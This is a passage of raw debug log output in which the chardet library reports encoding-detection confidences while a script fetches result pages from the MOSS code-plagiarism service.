active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32809\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32808\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5194405120835017\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-1.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5275032939294848\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5281419799938888\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25351\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19797\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19784\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19797\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19784\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25352\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19784\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19785\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19784\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5385101839887853\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5267551211286687\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5567203672689943\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25542\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19746\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21985\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25542\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25529\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19747\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19746\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25530\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21986\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21985\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5280973138154603\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5290601551539237\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5254607172954946\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19250\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19251\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36686\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19250\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36673\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40762\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36686\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36673\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40762\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-0.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40775\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36673\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40763\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36674\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36673\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40763\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40762\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5626135177179191\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 